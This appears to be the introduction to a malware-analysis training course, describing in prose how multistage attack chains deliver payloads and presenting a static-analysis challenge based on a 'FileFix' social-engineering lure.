Understanding Malware Attack Chains

As a malware analyst, you’ll often need to investigate how malware infects a computer from start to finish. Threat actors don’t typically tend to distribute the final stage malware payload directly. Instead, they break the attack into several steps, often referred to as a kill chain.

Here’s how a typical attack might work

For example, imagine someone receives a suspicious email with an attachment. When they open it, here’s what happens:

  1. The attachment is a zip file containing a JavaScript file
  2. When opened, this JavaScript file runs on the computer using a built-in framework known as WScript
  3. The JavaScript connect to an attacker-controlled url and downloads a malware loader
  4. The loader fetches and runs the malicious payload, often in memory

Why does this matter?

These attack chains can be fairly complex and may involve different programming languages at each step. Many threats download and run payloads in memory, avoiding saving malicious files to disk. This is key to reducing antivirus detections, as well as hindering analysis. Understanding different malware kill chains is an essential skill for malware analysts.

What you’ll be doing

In these challenges, you’ll work with example attack chains designed to mirror real world malware seen in the wild. Your goal is to trace each step of the chain until you reach the final payload, which contains a hidden flag. These exercises are more challenging than other labs, but they’ll give you hands-on experience with more realistic malware analysis.

Good luck, and have fun!

Multistage 1 - FileFix

Lab Type:
Static Analysis
Languages:
PowerShell
JavaScript
x86_64
Platform:
Windows 64-bit
Difficulty:
This challenge begins with a common 'FileFix' lure used to social engineer users into running malicious commands. You'll need to extract the malicious command from the web page and analyze the full infection chain.